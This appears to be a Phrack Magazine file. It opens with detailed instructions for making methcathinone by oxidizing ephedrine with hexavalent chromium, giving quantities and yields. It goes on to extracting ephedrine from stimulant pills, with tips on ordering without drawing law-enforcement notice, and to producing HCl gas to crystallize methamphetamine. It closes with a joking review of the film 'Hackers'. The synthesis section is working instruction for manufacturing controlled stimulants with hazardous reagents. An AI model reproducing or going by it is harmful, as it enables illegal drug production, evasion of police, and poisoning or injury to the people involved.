structural relationship to methcathinone that amphetamine has to
methamphetamine.  It is made by oxidizing ephedrine, while meth can be
made by reducing ephedrine. 

    The high produced by methcathinone is in many ways similar to
methamphetamine.  For something so easily made and purified, it is
actually quite enjoyable.  the main differences between the meth high and
the methcathinone high are length of action and body fell.  With
methcathinone, one can expect to still get to sleep about 8 hours after a
large dose.  On the down side, it definitely gives me the impression that
the substance raises the blood pressure quite markedly.  This drug may not
be safe for people with weak hearts of blood vessels.  Be warned! 

    Cat is best made using chrome in the +6 oxidation state as the
oxidizer. I recall seeing an article in the narco swine's Journal of
Forensic Science bragging about how they worked out a method for making it
using permanganate, but that method gives an impure product in low yields. 
Any of the common hexavalent chrome salts can be used as the oxidizer in
this reaction.  This list include chrome trioxide (CrO3), sodium or
potassium chromate (Na2CrO4), and sodium or potassium dichromate
(Na2Cr2O7).  All of these chemicals are very common.  Chrome trioxide is
used in great quantities in chrome plating. The chromates are used in
tanning and leather making. 

    To make methcathinone, the chemist starts with the water extract of
ephedrine pills.  The concentration of the reactants in this case is not
critically important, so it is most convenient to use the water extract of
the pills directly after filtering without any boiling away of the water.
See the section at the beginning of Chapter 15 [I included this at the end
of the file] on extracting ephedrine form pills.  Both ephedrine
hydrochloride and sulfate can be used in this reaction. 

    The water extract of 1000 ephedrine pills is placed into any
convenient glass container.  A large measuring cup is probably best since
it has a pouring lip.  Next, 75 grams of any of the above mentioned +6
chrome compounds are added.  They dissolve quite easily to form a reddish
or orange colored solution.  Finally, concentrated sulfuric acid is added. 
If CrO3 is being used, 21 mL is enough for the job.  If one of the
chromates is being used, 42 mL is called for.  These ingredients are
thoroughly mixed together, and allowed to sit for several hours with
occasional stirring. 

    After several hours have passed, lye solution is added to the batch
until it is strongly basic. Very strong stirring accompanies this process
to ensure that the cat is converted to the free base.  Next, the batch is
poured into a sep funnel, and a couple hundred mLs of toluene is added.
Vigorous shaking, as usual, extracts the cat into the toluene layer.  It
should be clear to pale yellow in color.  The water layer should be orange
mixed with green.  The green may settle out as a heavy sludge.  The water
layer is thrown away, and the toluene layer containing the cat is washed
once with water, then poured into a beaker. Dry HCl gas is passed through
the toluene as described in Chapter 5 [I included this at the end of the file]
to get white crystals of cat.  The yield is between 15 and 20
grams.  This reaction is scaled up quite easily. 


CHAPTER 15 (part of it anyway)

 P R O C E D U R E   F O R   O B T A I N I N G   P U R E   E P H E D R I N E
                   F R O M   S T I M U L A N T   P I L L S

    In the present chemical supply environment, the best routes for making
meth start with ephedrine as the raw material.  To use these routes, a
serious hurdle must first be overcome.  This hurdle is the fact that the
most easily obtained source of ephedrine, the so-called stimulant or
bronchodilator pills available cheaply by mail order, are a far cry from
the pure starting material a quality minded chemist craves.  Luckily,
there is a simple and very low profile method for separating the fillers
in these pills from the desired active ingredient they contain. 

    A superficial paging through many popular magazines[New Body is where
I found it at GNC] reveals them to be brim full of ads
from mail order outfits offering for sale "stimulant" or "bronchodilator"
pills. These are the raw materials today's clandestine operator requires
to manufacture meth without detection.  The crank maker can hide amongst
the huge herd of people who order these pills for the irritating and
nauseating high that can be had by eating them as is.  I have heard of a
few cases where search warrants were obtained against people who ordered
very large numbers of these pills, but I would think that orders of up to
a few thousand pills would pass unnoticed.  If larger numbers are
required, maybe one's friends could join in the effort. 

    The first thing one notices when scanning these ads is the large
variety of pills offered for sale. When one's purpose is to convert them
into methamphetamine, it is very easy to eliminate most of the pills
offered for sale.  Colored pills are automatically rejected because one
does not want the coloring to be carried into the product.  Similarly,
capsules are rejected because individually cutting open capsules is just
too much work. Bulky pills are to be avoided because they contain too much
filler.  The correct choice is white cross thins, preferably containing
ephedrine HCl instead of sulfate, because the HCl salt can be used in more
of the reduction routes than can the sulfate. 

    Once the desired supply of pills is in hand, the first thing which
should be done is to weigh them.  This will give the manufacturer an idea
of how much of the pills is filler, and how much is active ingredient. 
Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
contains 25 grams of active ingredient.  A good brand of white cross thins
will be around 33% to 40% active ingredient.  25 grams of ephedrine HCl
may not sound like much, but if it is all recovered from these pills, it
is enough to make from 1/2 to 3/4 ounce of pure meth.  This is worth three
or four thousand dollars, not a bad return on the twenty odd dollars a
thousand lot of such pills costs. [I don't know where he got 3 or 4
thousand dollars from, but the pills go for about $35.00/1000 now. 2
months ago they were $25.00 but now they have to do more paper work
because it is a DEA controlled substance]

    To extract the ephedrine from the pills, the first thing which must be
done is to grind them into a fine powder.  This pulverization must be
thorough in order to ensure complete extraction of the ephedrine form the
filler matrix in which it is bound.  A blender does a fine job of this
procedure, as will certain brands of home coffee grinders. 

    Next, the powder from 1000 pills is put into a glass beaker, or other
similar container having a pouring lip, and about 300 mL of distilled
water is added.  Gentle heat is then applied to the beaker, as for example
on a stove burner, and with steady stirring the contents of the beaker are
slowly brought up to a gentle boil.  It is necessary to stir constantly
because of the fillers will settle to the bottom of the beaker and cause
burning if not steadily stirred. 

    Once the contents of the beaker have been brought to a boil, it is
removed from the heat and allowed to settle.  Then the water is poured out
of the beaker through a piece of filter paper.  The filtered water should
be absolutely clear.  Next, another 50 mL of water is added to the pill
filler sludge, and it too is heated with stirring.  Finally, the pill
sludge is poured into the filter, and the water it contains is allowed to
filter through.  It too should be absolutely clear, and should be mixed in
with the first extract.  A little water may be poured over the top of the
filler sludge to get the last of the ephedrine out of it.  This sludge
should be nearly tasteless, and gritty in texture.  The water extract
should taste very bitter, as it contains the ephedrine. 

    The filtered water is now returned to the stove burner, and half of
the water it contains is gently boiled away.  Once this much water has
been boiled off, precautions should be taken to avoid burning the
ephedrine.  The best alternative is to evaporate the water off under a
vacuum.  If this is not practical with the equipment on hand, the water
may be poured into a glass baking dish.  This dish is then put into the
oven with the door cracked open, and the lowest heat applied.  In no time
at all, dry crystals of ephedrine HCl can be scraped out of the baking
dish with a razor blade. The serious kitchen experimenter may wish to
further dry them in a microwave. 

Chapter 5 (The part about the HCl gas)

    A source of anhydrous hydrogen chloride gas is now needed.  The
chemist will generate his own.  The glassware is set up as in Figure 1. 
He will have to bend another piece of glass tubing to the shape shown.  It
should start out about 18 inches long.  One end of it should be pushed
through a one hole stopper.  A 125 mL sep funnel is the best size.  The
stoppers and joints must be tight, since pressure must develop inside this
flask to force the hydrogen chloride gas out through the tubing as it is
generated. 

    Into the 1000 mL, three-necked flask is placed 200 grams of table
salt. Then 25% concentrated hydrochloric acid is added to this flask until
it reaches the level shown in the figure.  The hydrochloric acid must be
of laboratory grade [I use regular muriatic acid for pools].

Figure 1:
                   \     /
                  \   /ķ
                 ֽ        ӷ   <--125 mL separatory funnel
                           
                           
                 ӷ        ֽ
                  ķ    Ľ        glass tubing Ŀ
                    ӷ  ֽ                        
                                ͻ
           stopcock->ۺĴ                     Salt and Hydrochloric acid
stopper ->ķ     \/з      ķ <-1 hole    mixed into a paste by add-
          ĺ               ĺ    stopper  ing HCL to salt and mixing.
      Ľ   Ľ    Ľ  ķ         The surface should be rough
     ֽ                                ӷ        and a good number of holes
                                                should be poked into the
            1000 mL, 3 neck flask               paste for long lasting
                                                generation of HCl gas.
     ӷ   acid/salt level   ֽ        
      ķ                             Ľ         
        ķ                       Ľ           
           ķ         Ľ              
                  Ľ                     


    Some concentrated sulfuric acid (96-98%) is put into the sep funnel
and the spigot turned so that 1 mL of concentrated sulfuric acid flows
into the flask.  It dehydrates the hydrochloric acid and produces hydrogen
chloride gas. This gas is then forced by pressure through the glass
tubing. 

    One of the Erlenmeyer flasks containing methamphetamine in solvent is
placed so that the glass tubing extends into the methamphetamine, almost
reaching the bottom of the flask.  Dripping in more sulfuric acid as
needed keeps the flow of gas going to the methamphetamine.  If the flow if
gas is not maintained, the methamphetamine may solidify inside the glass
tubing, plugging it up. 

    Within a minute of bubbling, white crystals begin to appear in the
solution, More and more of them appear as the process continues.  It is an
awe-inspiring sight.  In a few minutes, the solution becomes as thick as
watery oatmeal. 

    It is now time to filter out the crystals, which is a two man job. 
The flask with the crystals in it is removed from the HCl source and
temporarily set aside.  The three-necked flask is swirled a little to
spread around the sulfuric acid and then the other Erlenmeyer flask is
subjected to a bubbling with HCl.  While this flask is being bubbled, the
crystals already in the other flask are filtered out. 

    The filtering flask and Buchner funnel are set up as shown in figure
2. The drain stem of the buchner funnel extends all the way through the
rubber stopper, because methamphetamine has a nasty tendency to dissolve
rubber stoppers.  This would color the product black.  A piece of filter
paper covers the flat bottom of the Buchner funnel.  The vacuum is turned
on and the hose attached to the vacuum nipple.  Then the crystals are
poured into the Buchner funnel.  The solvent and uncrystallized
methamphetamine pass through the filter paper and the crystals stay in the
Buchner funnel as a solid cake.  About 15 mL of solvent is poured into the
Erlenmeyer flask. the top of the flask is covered with the palm and it is
shaken to suspend the crystals left clinging to the sides.  This is also
poured into the Buchner funnel.  Finally, another 15 mL of solvent is
poured over the top of the filter cake. 


Figure 2:
                              Ŀ
                                          <-Bchner Funnel
                              ___________
                              \           /
                                \       /
                                  \   /
                                 Ŀ
                                        <--To vacuum
                                     Ŀ
                                         
                                         
                                       Ŀ
              Filtering                    
                  flask-->                
                                            
                            


    Now the vacuum hose is disconnected and the Buchner funnel, stopper
and all, is pulled from the filtering flask.  All of the filtered solvent
is poured back into the erlenmeyer flask it came from.  It is returned to
the HCl source for more bubbling.  The Buchner funnel is put back into the
top of the filtering flask.  It still contains the filter cake of
methamphetamine crystals.  It will now be dried out a little bit.  The
vacuum is turned back on, the vacuum hose is attached to the filtering
flask, and the top of the Buchner funnel is covered with the palm or
section of latex rubber glove.  The vacuum builds and removes most of the
solvent from the filter cake.  This takes about 60 seconds.  The filter
cake can now be dumped out onto a glass or China plate (not plastic) by
tipping the Buchner funnel upside-down and tapping it gently on the plate. 

    And so, the filtering process continues, one flask being filtered
while the other one is being bubbled with HCl.  Solvent is added to the
Erlenmeyer flask to keep their volumes at 300 mL.  Eventually, after each
flask has been bubbled for about seven times, no more crystal will come
out and the underground chemist is finished. 

    If ether was used as the solvent, the filter cakes on the plates will
be nearly dry now.  With a knife from the silverware drawer, the cakes are
cut into eighths.  They are allowed to dry out some more then chopped up
into powder.  If benzene was used, this process takes longer.  Heat lamps
may be used to speed up this drying, but no stronger heat source. 

[The above section of chapter 5 is talking about methamphetamine.  You
could, in most instances, substitute the word methcathinone, but I wanted
to present the text to you in its exact form.]


------------------------------------------------------------------------------


Review of "HACKERS"

By Wile Coyote

Sorry, it might be a little long...  cut it to ribbons if you want, most 
of it is just a rant anyway...  Hope you enjoy it.

  First off, I have to admit that I was biased going into the movie 
"Hackers"...  I heard that it wasn't going to be up to snuff, but did I 
let that stop me?  No, of course not...  I sucked up enough courage to 
stride towards my girlfriend and beg for seven bucks... :)  She ended up 
wanting to see the movie herself (and sadly, she rather enjoyed it...  
oh, well, what can you do with the computer illiterate or is it the 
computer illegitimate?). Now onto....

THE MOVIE

  (Yes, I AM going to give you a second-by-second playback of the 
movie...  you don't want me to spoil the plot, you say?  Well, don't 
worry, there is no plot to spoil! :) just kidding, go see it... maybe 
you'll like it...)
 
  Well, from the very first few seconds, I was unimpressed...  It begins 
with an FBI raid on some unsuspecting loose (who turns out to be the 
main character, but that's later) named Zero Cool (can you say "EL1EEEEET 
WaReZ D00D!!!!!!!1!!!!!111!!!!").  The cinematography was bad...  (Hey, 
cinematography counts!) But, the acting was worse.  The Feds bust into 
this home and run up the stairs, all while this lady (the mom) just kind 
of looks on dumbfounded and keeps saying stuff like "hey, stop that...", 
or something (is this what a raid is like?  I've never had the pleasure...)

Ok, so the story goes on like this:  The 11 year old kid made a computer 
virus that he uploads to, I think, the NY stock exchange, and it crashes 
1,507 computers.  There is a really lame court scene where the kid is 
sentenced to 7 years probation where he can't use a computer or a 
touch-tone phone...  That was 1988...

Time passes...  Now it's 1995, and boy have things changed (except the 
mom... hmmm....).  Now the ex-hacker is allowed to use a computer (his 
18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) 
boxing some TV station to change the program on television (yes, I know 
that all of you super-el33t hackers hack into TV stations when you don't 
like what's on Ricki Lake!).  N-e-way, while hacking into their 
super-funky system (the screen just kind of has numbers moving up and 
down the screen like some kind of hex-editor on acid...)
he gets into a "hacking battle" with some other hacker called Acid Burn 
(I don't think I have ever seen such a trippy view of the "Internet"...  
lots of Very high-end graphics, not very realistic, but it's Hollywood...).
In the end, the other hacker kicks the shit out of him (he has changed 
his handle to Crash Override now, just to be cool, i guess) and logs him 
off the TV station.  Wow, tense... cough...

For those of you who care, let me describe the "hacker" Crash Override:  
He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is 
(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) 
clothes, and the CDC might have quite a bit to say about the amount of 
leather he wears... I mean, there are limits to that kind of stuff, man!
And to top off his coolness, he is, like, the roller-blade king of the 
world.  (Not that hackers don't roller-blade, but he does it just Soooo 
much cooler than I could... :) ).  And yet, here's the nifty part, 
despite all of his deft coolness, he couldn't get a girl for the life 
of him (we all morn for him in silent prayer).  

Ok, so now Crash is at school, and he meets Wonderchick (who is 
EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she 
is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to 
spoil the suspense).

Now, while at school, he wants to hook up with wonderchick, so he breaks 
into the school's computer (it must be a fucking Cray to support all of 
the high-end-type graphics that this dude is pulling up) and gets his 
English(?) class changed to hers.  So, some other super-d00dcool hacker 
spots him playing around with the schools computer (it's funny how may 
elite hackers one can meet in a new york public school...), so he 
catches up with Crash and invites you to an elite (Oh, if you ever want 
to see a movie where the word 3l333333333t is used, like a fucking 
million times, then go see Hackers...) hackerz-only club, complete with 
million-dollar virtual-reality crap and even a token phreaker trying to 
red-box a pay-phone with a cassette recorder (never mind that the music is 
about 197 decibels, the phone can still pick up the box tones...).

What follows is that Crash meets up with some seriously k-rad hackers 
(Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and  
Phantom Phreak : who reminds of that gay kid on "my so called life...  
maybe that was him?";Lord Nikon : the token black hacker... Photographic 
memory is his super-power).  They talk about k00l pseudo-hacker shit and 
then a l00ser warez-type guy comes up and tries to be El33t like everybody 
else.  He is just about the ONLY realistic character in the whole movie.  
He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?".  He keeps 
saying "I need a handle, then I'll be el33t!".  (Why he can't just pick 
his own handle, like The Avenging Turd or something, is beyond me... He 
plays lamer better than the kids in Might Morphin Power Rangers...  awesome 
actor!).  N-e-way, this is where the major discrepancies start.  Ok, 
first they try to "test" Lamerboy by asking him what the four most used 
passwords are.  According to the movie, they are "love, sex, god, and 
secret".  (Hmmmm.... I thought Unix required a 6-8 char. password....).  
Somehow lamerboy got into a bank and screwed with an ATM machine four 
states away; all of the hacker chastise him for being stupid and hacking 
at home (If you watch the movie, you'll notice that the hackers use just 
about every pay-phone in the city to do their hacking, no, THAT doesn't 
look suspicious)Next they talk about "hacking a Gibson".  
(I was informed that they WANTED to use "hacking a Cray", 
but the Cray people decided that they didn't want THAT kind of publicity.  
I've never heard of a Gibson in real life, though...).  
They talk about how k-powerful the security is on a Gibson, and they say 
that if Lamerboy can crack one, then he gets to be elite.  

Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash 
loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy 
finally cracks a Gibson with the password God (never mind a Login name or 
anything that cool).  Then the cheese begins in full force.  The Gibson 
is like a total virtual-reality thingy.  Complete with all sorts of cool 
looking towers and neon lightning bolts and stuff.  Lamerboy hacks into a 
garbage file (did I mention that the entire world is populated by Macs?  
Oh, I didn't...   well, hold on :)...).  So, this sets alarms off all 
over the place (cause a top-secret file is hidden in the garbage, see?), 
and the main bad-guy, security chief Weasel, heads out to catch him.  He 
plays around with some neon, star-trek-console, buttons for a while, 
then calls the "feds" to put a trace on the kid.  La de da, ess catches him 
in a second, and the kid only gets half of the file, which he hides.
(to spoil the suspense, yet again, the file is some kind of money getting 
program, like the kind some LOD members wrote about a long time ago in 
Phrack, which pulls money from each transaction and puts it into 
a different account.  Needless to say, the Security Weasel is the guy who 
wrote it, which is why he needs it back, pronto!).

As we travel along the movie, the hackers keep getting busted for tapping 
into the Gibson, and they keep getting away.  The "action" heats up when 
Wonderchick and Crash get into a tiff and they decide to have a hacking 
contest...  They go all over the city trying their best to fuck with 
the one fed they don't like....  Brilliant move, eh? The movie kind of 
reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
They all fondle over the machine with the same intensity that Captain Kirk 
gave to fighting Klingons, and frankly, their acting abilities seems 
to ask "please deposit thirty-five cents for the next three minutes". 
It was funny listening to the actors, 'cause they didn't know shit about 
what they were saying...  Here's a clip:

Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem...  Not 
Kbps, mind you :)...I wonder where they designed a .8 of a bit?)

Yeah! Cool... Hey what kind of chip does it have in it?

A P6!  Three times faster than a Pentium....  Yep, RISC is the wave of 
the future...  (I laughed so hard.....  Ok, first of all, it is a Mac.  
Trust me, it has the little apple on the cover.  Second it has a P6, what 
server she ripped this out of, I dare not ask.  How she got that 
bastard into a laptop without causing the casing to begin melting is 
yet another problem...  those get very hot, i just read about them 
in PC magazine (wow, I must be elite too).  Finally, this is a *magic* P6, 
because it has RISC coding....  

I kinda wished I had stayed for the credits to see the line: 

Technical advisor                      None.... died on route to work...)

Finally they ask something about the screen, and they find out it is 
an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!

They do lots of nifty things with their magic laptops (I noticed that they 
ALL had laptops, and they were ALL Macintoshes.  Now, I'm not one to say 
you can't hack on a mac, 'cause really you can hack on a TI-81 if you've 
got the know.... but please, not EVERYONE in the fucking movie 
has to have the exact same computer (different colors, though... there 
was a really cool clear one).... it got really sad at the end), and they 
finally find out what the garbage file that Lamerboy stole was, this time 
using a hex editor/CAD program of some sort.

As we reach the end of the movie, the hackers enlist the help of two very 
strangely painted phone phreaks who give the advice to the hackers to send 
a message to all of the hackers on the 'net, and together, they all 
kicked some serious ass with the super-nifty-virtual-reality Gibson.

In the end, all of the Hackers get caught except for one, who pirates all 
of the TV station in the world and gives the police the "real" story...  
So, the police politely let them go, no need for actually proving that the 
evidence was real or anything, of course.

So, in the end, I had to say that the movie was very lacking.  It seemed 
to be more of a Hollywood-type flashy movie, than an actual documentary 
about hackers.  Yes, I know an ACTUAL movie about hacker would suck, but 
PLEASE, just a LITTLE bit of reality helps keep the movie grounded.  It 
may have sucked less if they didn't put flashing, 64 million color, 
fully-rendered, magically delicious pictures floating all over the screen 
instead of just a simple "# " prompt at the bottom.  With all of the 
super-easy access to all of the worlds computers, as depicted in the movie, 
ANYBODY can be a hacker, regardless of knowledge, commitment, or just 
plain common sense.  And that's what really made it suck... 

Hope you enjoyed my review of HACKERS!

 

[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2021, Phrack Magazine.